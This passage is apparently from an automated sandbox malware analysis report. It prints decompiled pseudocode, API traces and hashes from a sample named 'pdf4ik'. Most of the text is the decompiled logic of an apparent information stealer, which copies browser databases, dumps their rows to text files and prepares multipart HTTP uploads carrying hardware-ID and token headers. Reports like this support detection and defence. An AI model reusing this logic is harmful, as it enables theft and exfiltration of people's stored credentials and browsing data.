                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 29D985E1
                                        • lstrcatA.KERNEL32(?,?), ref: 29D98610
                                        • InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 29D9862A
                                        • InternetCloseHandle.WININET(00000100), ref: 29D9864B
                                        • InternetCloseHandle.WININET(00000000), ref: 29D98652
                                        • InternetCloseHandle.WININET(00000000), ref: 29D9865F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$Internet$_memset$Http$Request$Heap$CloseHandleHeaders_memmove$AllocConnectFileOpenProcessRead$InfoOptionQuerySendSleep
                                        • String ID: "$----$------$200$Cont$Content-Disposition: form-data; name="$HTTP/1.1$POST$X-Id: $X-Token: $X-hwid: $art/for$boun$dary=$e: multip$ent-Typ$file$https://$m-data;
                                        • API String ID: 2944485271-3064613715
                                        • Opcode ID: 23a440b257f2f66b1b92a64c874ddf0a10f3e3a7f04ef3515fdba50718bcd88e
                                        • Instruction ID: 2b111588f44f9b4fe2668adf81f712adcf83e429122a91f55460bc1f2c669d29
                                        • Opcode Fuzzy Hash: 23a440b257f2f66b1b92a64c874ddf0a10f3e3a7f04ef3515fdba50718bcd88e
                                        • Instruction Fuzzy Hash: C60254B3980254ABDB11EBA4DC8CFDE7778BF58B01F008599F609E7140DBB49A859F60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 46%
                                        			E29D99A80(intOrPtr __ecx, intOrPtr __edx, CHAR* _a4, CHAR* _a8, CHAR* _a12, intOrPtr* _a16) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				char _v284;
                                        				char _v548;
                                        				intOrPtr _v556;
                                        				char _v560;
                                        				char _v576;
                                        				char _v580;
                                        				CHAR* _v584;
                                        				CHAR* _v588;
                                        				char _v592;
                                        				CHAR* _v596;
                                        				CHAR* _v600;
                                        				intOrPtr _v604;
                                        				intOrPtr* _v608;
                                        				intOrPtr _v612;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t75;
                                        				signed int _t76;
                                        				void* _t80;
                                        				int _t81;
                                        				intOrPtr _t82;
                                        				int _t83;
                                        				signed int _t91;
                                        				void* _t109;
                                        				long _t111;
                                        				void* _t117;
                                        				int _t118;
                                        				CHAR* _t121;
                                        				CHAR* _t124;
                                        				CHAR* _t125;
                                        				CHAR* _t128;
                                        				void* _t129;
                                        				void* _t131;
                                        				CHAR* _t133;
                                        				void* _t148;
                                        				CHAR* _t151;
                                        				void* _t154;
                                        				intOrPtr _t157;
                                        				void* _t158;
                                        				CHAR* _t159;
                                        				void* _t160;
                                        				CHAR* _t161;
                                        				intOrPtr _t165;
                                        				CHAR* _t173;
                                        				intOrPtr* _t178;
                                        				intOrPtr _t182;
                                        				intOrPtr _t187;
                                        				CHAR* _t190;
                                        				intOrPtr _t200;
                                        				void* _t206;
                                        				CHAR* _t207;
                                        				void* _t208;
                                        				CHAR* _t209;
                                        				void* _t212;
                                        				void* _t213;
                                        				CHAR* _t214;
                                        				intOrPtr _t215;
                                        				CHAR* _t216;
                                        				signed int _t217;
                                        				void* _t218;
                                        				void* _t219;
                                        				void* _t222;
                                        				void* _t224;
                                        				void* _t225;
                                        				void* _t228;
                                        				void* _t230;
                                        
                                        				_t219 = _t218 - 0x254;
                                        				_t75 =  *0x29dd5664; // 0xd9555f04
                                        				_t76 = _t75 ^ _t217;
                                        				_v20 = _t76;
                                        				 *[fs:0x0] =  &_v16;
                                        				_t207 = _a12;
                                        				_t159 = _a8;
                                        				_v612 = __ecx;
                                        				_t165 =  *0x29dd7e0c; // 0x15a1bd0
                                        				_v588 = _a4;
                                        				_v604 = __edx;
                                        				_v608 = _a16;
                                        				_t80 =  *0x29dd8550(_t207, _t165, _t76, _t206, _t212, _t158,  *[fs:0x0], E29DC32EB, 0xffffffff);
                                        				_t231 = _t80;
                                        				if(_t80 != 0) {
                                        					_t189 =  *0x29dd7e34; // 0x15a1be0
                                        					_t81 =  *0x29dd8550(_t207, _t189);
                                        					__eflags = _t81;
                                        					if(_t81 != 0) {
                                        						_t82 =  *0x29dd8110; // 0x15a5048
                                        						_t83 =  *0x29dd8550(_t159, _t82);
                                        						__eflags = _t83;
                                        						if(_t83 == 0) {
                                        							goto L30;
                                        						}
                                        						goto L5;
                                        					}
                                        					_t159 = 0x29dcd617;
                                        					goto L5;
                                        				} else {
                                        					_t159 = 0x29dcd617;
                                        					L5:
                                        					E29DB5640( &_v548, 0, 0x104);
                                        					_t190 =  *0x29dd8098; // 0x15a1f98
                                        					lstrcatA( &_v548, _t190);
                                        					_t214 = E29DADFE0(_t190, _t207, _t212, 0x1a);
                                        					 *_t214 = 0;
                                        					E29DAFCE4(GetTickCount());
                                        					_t222 = _t219 + 0x14;
                                        					_v584 = 0x1a;
                                        					do {
                                        						_t91 = E29DAFCF6(_t231);
                                        						asm("cdq");
                                        						_push(_t91 % 0xa);
                                        						_push(_t214);
                                        						wsprintfA(_t214, "%s%d");
                                        						_t222 = _t222 + 0x10;
                                        						_t18 =  &_v584;
                                        						 *_t18 = _v584 - 1;
                                        					} while ( *_t18 != 0);
                                        					_t214[0x1a] = 0;
                                        					lstrcatA( &_v548, _t214);
                                        					CopyFileA(_v588,  &_v548, 1);
                                        					E29DB5640( &_v284, 0, 0x104);
                                        					lstrcatA( &_v284, "\\");
                                        					_t173 =  *0x29dd8104; // 0x15a1a80
                                        					lstrcatA( &_v284, _t173);
                                        					lstrcatA( &_v284, "\\");
                                        					lstrcatA( &_v284, _t207);
                                        					lstrcatA( &_v284, "_");
                                        					lstrcatA( &_v284, _t159);
                                        					lstrcatA( &_v284, ".txt");
                                        					_t215 =  *0x29dd7d94; // 0x159a8d0
                                        					_t189 =  &_v592;
                                        					_t109 =  *0x29dd8344( &_v548,  &_v592);
                                        					_t224 = _t222 + 0x14;
                                        					if(_t109 != 0) {
                                        						L29:
                                        						_t83 = DeleteFileA( &_v548);
                                        						L30:
                                        						 *[fs:0x0] = _v16;
                                        						_pop(_t208);
                                        						_pop(_t213);
                                        						_pop(_t160);
                                        						return E29DADF46(_t83, _t160, _v20 ^ _t217, _t189, _t208, _t213);
                                        					}
                                        					_t111 =  *0x29dd82f8(_v592, _t215, 0xffffffff,  &_v580, _t109);
                                        					_t225 = _t224 + 0x14;
                                        					if(_t111 != 0) {
                                        						L28:
                                        						 *0x29dd8318(_v580);
                                        						_t189 = _v592;
                                        						 *0x29dd8348(_v592);
                                        						goto L29;
                                        					}
                                        					_t216 = HeapAlloc(GetProcessHeap(), _t111, 0xf423f);
                                        					_t117 =  *0x29dd8314(_v580);
                                        					_t225 = _t225 + 4;
                                        					if(_t117 != 0x64) {
                                        						L23:
                                        						_t118 = lstrlenA(_t216);
                                        						_t178 = _v608;
                                        						if(_t178 != 0) {
                                        							__eflags =  *_t178 - 2;
                                        							if( *_t178 == 2) {
                                        								 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t178 + 4)), _t216,  &_v284, _t118, 3);
                                        							} else {
                                        								 *0x29dd8814 = 0x80000;
                                        							}
                                        						} else {
                                        							 *0x29dd8814 = 0x10000;
                                        						}
                                        						goto L28;
                                        					} else {
                                        						goto L10;
                                        					}
                                        					do {
                                        						L10:
                                        						_t121 =  *0x29dd8334(_v580, 0);
                                        						_v588 = _t121;
                                        						_t161 =  *0x29dd8334(_v580, 1);
                                        						_t124 =  *0x29dd8334(_v580, 2);
                                        						_v600 = _t124;
                                        						_t125 =  *0x29dd8334(_v580, 3);
                                        						_t209 = _t125;
                                        						_v584 =  *0x29dd8334(_v580, 4);
                                        						_t128 =  *0x29dd8334(_v580, 5);
                                        						_t228 = _t225 + 0x30;
                                        						_v596 = _t128;
                                        						_t129 =  *0x29dd8550(_t161, "0");
                                        						 *_t161 = 0;
                                        						if(_t129 != 0) {
                                        							_t200 =  *0x29dd820c; // 0x15a1930
                                        							_push(_t200);
                                        						} else {
                                        							_t187 =  *0x29dd7dec; // 0x15a1a90
                                        							_push(_t187);
                                        						}
                                        						lstrcatA(_t161, ??);
                                        						_t131 =  *0x29dd8550(_t209, "0");
                                        						 *_t209 = 0;
                                        						if(_t131 != 0) {
                                        							_t182 =  *0x29dd820c; // 0x15a1930
                                        							_push(_t182);
                                        						} else {
                                        							_t157 =  *0x29dd7dec; // 0x15a1a90
                                        							_push(_t157);
                                        						}
                                        						lstrcatA(_t209, ??);
                                        						_t133 = _v584;
                                        						if( *_t133 == 0x2d) {
                                        							 *_t133 = 0;
                                        							lstrcatA(_t133, "0");
                                        						}
                                        						lstrcatA(_t216, _v588);
                                        						lstrcatA(_t216, "\t");
                                        						lstrcatA(_t216, _t161);
                                        						lstrcatA(_t216, "\t");
                                        						lstrcatA(_t216, _v600);
                                        						lstrcatA(_t216, "\t");
                                        						lstrcatA(_t216, _t209);
                                        						lstrcatA(_t216, "\t");
                                        						lstrcatA(_t216, _v584);
                                        						lstrcatA(_t216, "\t");
                                        						lstrcatA(_t216, _v596);
                                        						lstrcatA(_t216, "\t");
                                        						_t148 =  *0x29dd8320(_v580, 6, _v612, _v604);
                                        						_t151 = E29D99510( &_v576,  *0x29dd8328(), _t148, _v580, 6);
                                        						_t230 = _t228 + 0x18;
                                        						_v8 = 0;
                                        						if(_t151[0x14] >= 0x10) {
                                        							_t151 =  *_t151;
                                        						}
                                        						lstrcatA(_t216, _t151);
                                        						_v8 = 0xffffffff;
                                        						if(_v556 >= 0x10) {
                                        							_push(_v576);
                                        							E29DADF3B();
                                        							_t230 = _t230 + 4;
                                        						}
                                        						_v556 = 0xf;
                                        						_v560 = 0;
                                        						_v576 = 0;
                                        						lstrcatA(_t216, "\n");
                                        						_t154 =  *0x29dd8314(_v580);
                                        						_t225 = _t230 + 4;
                                        					} while (_t154 == 0x64);
                                        					goto L23;
                                        				}
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$_memset$CopyCountFileTick_malloc_randwsprintf
                                        • String ID: %s%d$.txt
                                        • API String ID: 4014965780-2508900824
                                        • Opcode ID: 1366646bc55f11f2d188b65b0271ddb83259f345184d9c3d96d2e09baebb1360
                                        • Instruction ID: 55afe4f97dcf24389b34434e45d1d1426d2293164ee6c0c634c6145c4332e30c
                                        • Opcode Fuzzy Hash: 1366646bc55f11f2d188b65b0271ddb83259f345184d9c3d96d2e09baebb1360
                                        • Instruction Fuzzy Hash: EED15EB2941254ABD711AFA4DC88F9EB7B8FF59B01F048199F509D3240EB389A45EF70
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 52%
                                        			E29D9ACA0(CHAR* __ecx, intOrPtr* __edx, void* __eflags, CHAR* _a4, CHAR* _a8) {
                                        				signed int _v8;
                                        				char _v276;
                                        				char _v540;
                                        				char _v544;
                                        				CHAR* _v548;
                                        				CHAR* _v552;
                                        				char _v556;
                                        				CHAR* _v560;
                                        				CHAR* _v564;
                                        				intOrPtr* _v568;
                                        				CHAR* _v572;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t56;
                                        				signed int _t65;
                                        				CHAR* _t73;
                                        				void* _t83;
                                        				long _t88;
                                        				CHAR* _t92;
                                        				void* _t93;
                                        				int _t94;
                                        				CHAR* _t99;
                                        				CHAR* _t100;
                                        				CHAR* _t103;
                                        				CHAR* _t104;
                                        				CHAR* _t105;
                                        				void* _t106;
                                        				void* _t108;
                                        				void* _t126;
                                        				CHAR* _t127;
                                        				CHAR* _t129;
                                        				intOrPtr* _t140;
                                        				void* _t161;
                                        				CHAR* _t162;
                                        				void* _t163;
                                        				CHAR* _t164;
                                        				CHAR* _t165;
                                        				signed int _t166;
                                        				void* _t167;
                                        				void* _t170;
                                        				void* _t172;
                                        				void* _t173;
                                        				void* _t176;
                                        				void* _t177;
                                        
                                        				_t177 = __eflags;
                                        				_t56 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t56 ^ _t166;
                                        				_t127 = _a4;
                                        				_v552 = _a8;
                                        				_v548 = __ecx;
                                        				_v568 = __edx;
                                        				E29DB5640( &_v540, 0, 0x104);
                                        				_t129 =  *0x29dd8098; // 0x15a1f98
                                        				lstrcatA( &_v540, _t129);
                                        				_t164 = E29DADFE0( &_v540, _t161, _t163, 0x1a);
                                        				 *_t164 = 0;
                                        				E29DAFCE4(GetTickCount());
                                        				_t170 = _t167 + 0x14;
                                        				_t162 = 0x1a;
                                        				do {
                                        					_t65 = E29DAFCF6(_t177);
                                        					asm("cdq");
                                        					_push(_t65 % 0xa);
                                        					_push(_t164);
                                        					wsprintfA(_t164, "%s%d");
                                        					_t170 = _t170 + 0x10;
                                        					_t162 = _t162 - 1;
                                        				} while (_t162 != 0);
                                        				_t164[0x1a] = 0;
                                        				lstrcatA( &_v540, _t164);
                                        				CopyFileA(_t127,  &_v540, 1);
                                        				E29DB5640( &_v276, _t162, 0x104);
                                        				lstrcatA( &_v276, "\\");
                                        				_t73 =  *0x29dd8104; // 0x15a1a80
                                        				lstrcatA( &_v276, _t73);
                                        				lstrcatA( &_v276, "\\");
                                        				lstrcatA( &_v276, _v548);
                                        				lstrcatA( &_v276, "_");
                                        				lstrcatA( &_v276, _v552);
                                        				_t153 =  &_v276;
                                        				lstrcatA( &_v276, ".txt");
                                        				_t165 =  *0x29dd7c24; // 0x158ef60
                                        				_t83 =  *0x29dd8344( &_v540,  &_v556);
                                        				_t172 = _t170 + 0x14;
                                        				if(_t83 != 0) {
                                        					L18:
                                        					return E29DADF46(DeleteFileA( &_v540), _t127, _v8 ^ _t166, _t153, _t162, _t165);
                                        				}
                                        				_t88 =  *0x29dd82f8(_v556, _t165, 0xffffffff,  &_v544, _t83);
                                        				_t173 = _t172 + 0x14;
                                        				if(_t88 != 0) {
                                        					L17:
                                        					 *0x29dd8318(_v544);
                                        					_t153 = _v556;
                                        					 *0x29dd8348(_v556);
                                        					goto L18;
                                        				}
                                        				_t92 = HeapAlloc(GetProcessHeap(), _t88, 0xf423f);
                                        				_t165 = _t92;
                                        				_t93 =  *0x29dd8314(_v544);
                                        				_t173 = _t173 + 4;
                                        				if(_t93 != 0x64) {
                                        					L12:
                                        					_t94 = lstrlenA(_t165);
                                        					_t140 = _v568;
                                        					if(_t140 != 0) {
                                        						__eflags =  *_t140 - 2;
                                        						if( *_t140 == 2) {
                                        							 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t140 + 4)), _t165,  &_v276, _t94, 3);
                                        						} else {
                                        							 *0x29dd8814 = 0x80000;
                                        						}
                                        					} else {
                                        						 *0x29dd8814 = 0x10000;
                                        					}
                                        					goto L17;
                                        				} else {
                                        					goto L5;
                                        				}
                                        				do {
                                        					L5:
                                        					_v552 =  *0x29dd8334(_v544, 0);
                                        					_t99 =  *0x29dd8334(_v544, 1);
                                        					_t162 = _t99;
                                        					_t100 =  *0x29dd8334(_v544, 2);
                                        					_v548 = _t100;
                                        					_t127 =  *0x29dd8334(_v544, 3);
                                        					_t103 =  *0x29dd8334(_v544, 4);
                                        					_v560 = _t103;
                                        					_t104 =  *0x29dd8334(_v544, 5);
                                        					_v564 = _t104;
                                        					_t105 =  *0x29dd8334(_v544, 6);
                                        					_t176 = _t173 + 0x38;
                                        					_v572 = _t105;
                                        					_t106 =  *0x29dd8550(_t162, "0");
                                        					 *_t162 = 0;
                                        					if(_t106 != 0) {
                                        						_push("FALSE");
                                        					} else {
                                        						_push("TRUE");
                                        					}
                                        					lstrcatA(_t162, ??);
                                        					_t108 =  *0x29dd8550(_t127, "0");
                                        					 *_t127 = 0;
                                        					if(_t108 != 0) {
                                        						_push("FALSE");
                                        					} else {
                                        						_push("TRUE");
                                        					}
                                        					lstrcatA(_t127, ??);
                                        					lstrcatA(_t165, _v552);
                                        					lstrcatA(_t165, "\t");
                                        					lstrcatA(_t165, _t162);
                                        					lstrcatA(_t165, "\t");
                                        					lstrcatA(_t165, _v548);
                                        					lstrcatA(_t165, "\t");
                                        					lstrcatA(_t165, _t127);
                                        					lstrcatA(_t165, "\t");
                                        					lstrcatA(_t165, _v560);
                                        					lstrcatA(_t165, "\t");
                                        					lstrcatA(_t165, _v564);
                                        					lstrcatA(_t165, "\t");
                                        					lstrcatA(_t165, _v572);
                                        					lstrcatA(_t165, "\n");
                                        					_t126 =  *0x29dd8314(_v544);
                                        					_t173 = _t176 + 4;
                                        				} while (_t126 == 0x64);
                                        				goto L12;
                                        			}


                                        APIs
                                        • _memset.LIBCMT ref: 29D9ACDC
                                        • lstrcatA.KERNEL32(?,015A1F98,?,?,29DCD617), ref: 29D9ACF2
                                        • _malloc.LIBCMT ref: 29D9ACFA
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D9AD07
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D9AD20
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D9AD35
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9AD4D
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9AD5D
                                        • _memset.LIBCMT ref: 29D9AD70
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9AD84
                                        • lstrcatA.KERNEL32(?,015A1A80,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9AD97
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADA9
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADBD
                                        • lstrcatA.KERNEL32(?,29DCFF1C,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADCF
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADE3
                                        • lstrcatA.KERNEL32(?,.txt,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADF5
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9AE49
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D9AE50
                                        • StrCmpCA.SHLWAPI(00000000,29DCFF20), ref: 29D9AF05
                                        • lstrcatA.KERNEL32(00000000,FALSE), ref: 29D9AF22
                                        • StrCmpCA.SHLWAPI(00000000,29DCFF20), ref: 29D9AF2E
                                        • lstrcatA.KERNEL32(00000000,FALSE), ref: 29D9AF4B
                                        • lstrcatA.KERNEL32(00000000,?), ref: 29D9AF59
                                        • lstrcatA.KERNEL32(00000000,29DCFF24), ref: 29D9AF65
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9AF6D
                                        • lstrcatA.KERNEL32(00000000,29DCFF24), ref: 29D9AF79
                                        • lstrcatA.KERNEL32(00000000,?), ref: 29D9AF87
                                        • lstrcatA.KERNEL32(00000000,29DCFF24), ref: 29D9AF93
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9AF9B
                                        • lstrcatA.KERNEL32(00000000,29DCFF24), ref: 29D9AFA7
                                        • lstrcatA.KERNEL32(00000000,?), ref: 29D9AFB5
                                        • lstrcatA.KERNEL32(00000000,29DCFF24), ref: 29D9AFC1
                                        • lstrcatA.KERNEL32(00000000,?), ref: 29D9AFCF
                                        • lstrcatA.KERNEL32(00000000,29DCFF24), ref: 29D9AFDB
                                        • lstrcatA.KERNEL32(00000000,?), ref: 29D9AFE9
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9AFF5
                                        • lstrlenA.KERNEL32(00000000), ref: 29D9B015
                                        • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9B082
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$File__getptd_memset$AllocAllocateCopyCountDeleteProcessTick_malloc_randlstrlenwsprintf
                                        • String ID: %s%d$.txt$FALSE$TRUE
                                        • API String ID: 1707634767-1330936189
                                        • Opcode ID: f5796510cbf98473105470ec2af972865b2069291ee585f3c6ff5de481aac5a9
                                        • Instruction ID: 2c8fe063cbba89a2dbb09abb55e5a24ea77d3dc1455ca6b271e43520f3fd3d27
                                        • Opcode Fuzzy Hash: f5796510cbf98473105470ec2af972865b2069291ee585f3c6ff5de481aac5a9
                                        • Instruction Fuzzy Hash: F0A160B2981258ABC712ABA4DC8CFDE77B8EF5D701F00859CF509D2240DB789A45AF71
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 49%
                                        			E29D99680(CHAR* __ecx, CHAR* __edx, CHAR* __esi, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                        				CHAR* _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				char _v284;
                                        				intOrPtr _v292;
                                        				CHAR* _v296;
                                        				CHAR* _v312;
                                        				char _v316;
                                        				CHAR* _v320;
                                        				char _v324;
                                        				CHAR* _v328;
                                        				CHAR* _v332;
                                        				intOrPtr _v336;
                                        				void* __ebx;
                                        				void* __edi;
                                        				signed int _t58;
                                        				signed int _t59;
                                        				signed int _t69;
                                        				void* _t76;
                                        				int _t77;
                                        				void* _t79;
                                        				void* _t84;
                                        				CHAR* _t85;
                                        				void* _t88;
                                        				CHAR** _t92;
                                        				CHAR* _t109;
                                        				void* _t112;
                                        				CHAR* _t126;
                                        				CHAR* _t131;
                                        				void* _t132;
                                        				CHAR* _t150;
                                        				CHAR* _t152;
                                        				CHAR* _t153;
                                        				intOrPtr _t154;
                                        				CHAR* _t156;
                                        				CHAR* _t164;
                                        				CHAR* _t165;
                                        				intOrPtr _t166;
                                        				void* _t169;
                                        				void* _t170;
                                        				intOrPtr _t171;
                                        				void* _t172;
                                        				CHAR* _t173;
                                        				CHAR* _t174;
                                        				signed int _t175;
                                        				void* _t176;
                                        				void* _t180;
                                        				void* _t181;
                                        				void* _t182;
                                        				void* _t187;
                                        				signed int _t188;
                                        
                                        				_t174 = __esi;
                                        				_push(0xffffffff);
                                        				_push(E29DC21EB);
                                        				_push( *[fs:0x0]);
                                        				_t58 =  *0x29dd5664; // 0xd9555f04
                                        				_t59 = _t58 ^ _t175;
                                        				_t188 = _t59;
                                        				_v20 = _t59;
                                        				_push(_t169);
                                        				_push(_t59);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v320 = __ecx;
                                        				_v332 = _a4;
                                        				_v328 = __edx;
                                        				_v336 = _a12;
                                        				E29DB5640( &_v284, 0, 0x104);
                                        				_t156 =  *0x29dd8098; // 0x15a1f98
                                        				lstrcatA( &_v284, _t156);
                                        				_t131 = E29DADFE0(_t156, _t169, __esi, 0x1a);
                                        				 *_t131 = 0;
                                        				E29DAFCE4(GetTickCount());
                                        				_t180 = _t176 - 0x144 + 0x14;
                                        				_t170 = 0x1a;
                                        				do {
                                        					_t69 = E29DAFCF6(_t188);
                                        					asm("cdq");
                                        					_push(_t69 % 0xa);
                                        					_push(_t131);
                                        					wsprintfA(_t131, "%s%d");
                                        					_t180 = _t180 + 0x10;
                                        					_t170 = _t170 - 1;
                                        				} while (_t170 != 0);
                                        				_t131[0x1a] = 0;
                                        				lstrcatA( &_v284, _t131);
                                        				CopyFileA(_v320,  &_v284, 1);
                                        				_t171 =  *0x29dd7e98; // 0x15920e8
                                        				_t159 =  &_v324;
                                        				_t76 =  *0x29dd8344( &_v284,  &_v324);
                                        				_t181 = _t180 + 8;
                                        				if(_t76 == 0) {
                                        					_t79 =  *0x29dd82f8(_v324, _t171, 0xffffffff,  &_v316, _t76);
                                        					_t182 = _t181 + 0x14;
                                        					if(_t79 == 0) {
                                        						_t84 =  *0x29dd8314(_v316);
                                        						_t182 = _t182 + 4;
                                        						if(_t84 == 0x64) {
                                        							do {
                                        								_t85 =  *0x29dd8334(_v316, 0);
                                        								_v320 = _t85;
                                        								_t173 =  *0x29dd8334(_v316, 1);
                                        								_t88 =  *0x29dd8320(_v316, 2, _a8, _v336);
                                        								E29D99510( &_v312,  *0x29dd8328(), _t88, _v316, 2);
                                        								_t187 = _t182 + 0x28;
                                        								_v8 = 0;
                                        								_t92 = _v312;
                                        								if(_v292 < 0x10) {
                                        									_t92 =  &_v312;
                                        								}
                                        								_push(0x29dcd617);
                                        								_push(_t92);
                                        								if( *0x29dd8550() != 0) {
                                        									lstrcatA(_t174, "\n");
                                        									_t164 =  *0x29dd7ed8; // 0x15a1a00
                                        									lstrcatA(_t174, _t164);
                                        									lstrcatA(_t174, _v328);
                                        									lstrcatA(_t174, " [");
                                        									lstrcatA(_t174, _v332);
                                        									lstrcatA(_t174, "]\n");
                                        									_t165 =  *0x29dd81e0; // 0x15a1a10
                                        									lstrcatA(_t174, _t165);
                                        									lstrcatA(_t174, _v320);
                                        									lstrcatA(_t174, "\n");
                                        									_t150 =  *0x29dd7c9c; // 0x15a1a20
                                        									lstrcatA(_t174, _t150);
                                        									lstrcatA(_t174, _t173);
                                        									lstrcatA(_t174, "\n");
                                        									_t166 =  *0x29dd819c; // 0x15a4b68
                                        									_push(_t166);
                                        									goto L11;
                                        								} else {
                                        									_push(0x29dcd617);
                                        									_push(_t173);
                                        									if( *0x29dd8550() != 0) {
                                        										lstrcatA(_t174, "\n");
                                        										_t152 =  *0x29dd7ed8; // 0x15a1a00
                                        										lstrcatA(_t174, _t152);
                                        										lstrcatA(_t174, _v328);
                                        										lstrcatA(_t174, " [");
                                        										lstrcatA(_t174, _v332);
                                        										lstrcatA(_t174, "]\n");
                                        										_t153 =  *0x29dd81e0; // 0x15a1a10
                                        										lstrcatA(_t174, _t153);
                                        										lstrcatA(_t174, _v320);
                                        										lstrcatA(_t174, "\n");
                                        										_t126 =  *0x29dd7c9c; // 0x15a1a20
                                        										lstrcatA(_t174, _t126);
                                        										lstrcatA(_t174, _t173);
                                        										lstrcatA(_t174, "\n");
                                        										_t154 =  *0x29dd819c; // 0x15a4b68
                                        										_push(_t154);
                                        										L11:
                                        										lstrcatA(_t174, ??);
                                        										_t109 = _v312;
                                        										if(_v292 < 0x10) {
                                        											_t109 =  &_v312;
                                        										}
                                        										lstrcatA(_t174, _t109);
                                        										lstrcatA(_t174, "\n\n");
                                        									}
                                        								}
                                        								_v8 = 0xffffffff;
                                        								if(_v292 >= 0x10) {
                                        									_push(_v312);
                                        									E29DADF3B();
                                        									_t187 = _t187 + 4;
                                        								}
                                        								_v292 = 0xf;
                                        								_v296 = 0;
                                        								_v312 = 0;
                                        								_t112 =  *0x29dd8314(_v316);
                                        								_t182 = _t187 + 4;
                                        							} while (_t112 == 0x64);
                                        						}
                                        					}
                                        					_t159 = _v316;
                                        					 *0x29dd8318(_v316);
                                        					 *0x29dd8348(_v324);
                                        				}
                                        				_t77 = DeleteFileA( &_v284);
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t172);
                                        				_pop(_t132);
                                        				return E29DADF46(_t77, _t132, _v20 ^ _t175, _t159, _t172, _t174);
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 29D996D9
                                        • lstrcatA.KERNEL32(?,015A1F98,D9555F04,?,?), ref: 29D996EF
                                        • _malloc.LIBCMT ref: 29D996F7
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D99704
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D99718
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D9972D
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D99745
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9975B
                                        • StrCmpCA.SHLWAPI(?,29DCD617), ref: 29D99851
                                        • StrCmpCA.SHLWAPI(00000000,29DCD617), ref: 29D99865
                                        • lstrcatA.KERNEL32(?,29DCD628), ref: 29D99879
                                        • lstrcatA.KERNEL32(?,015A1A00), ref: 29D99887
                                        • lstrcatA.KERNEL32(?,?), ref: 29D99895
                                        • lstrcatA.KERNEL32(?,29DCFC3C), ref: 29D998A1
                                        • lstrcatA.KERNEL32(?,?), ref: 29D998AF
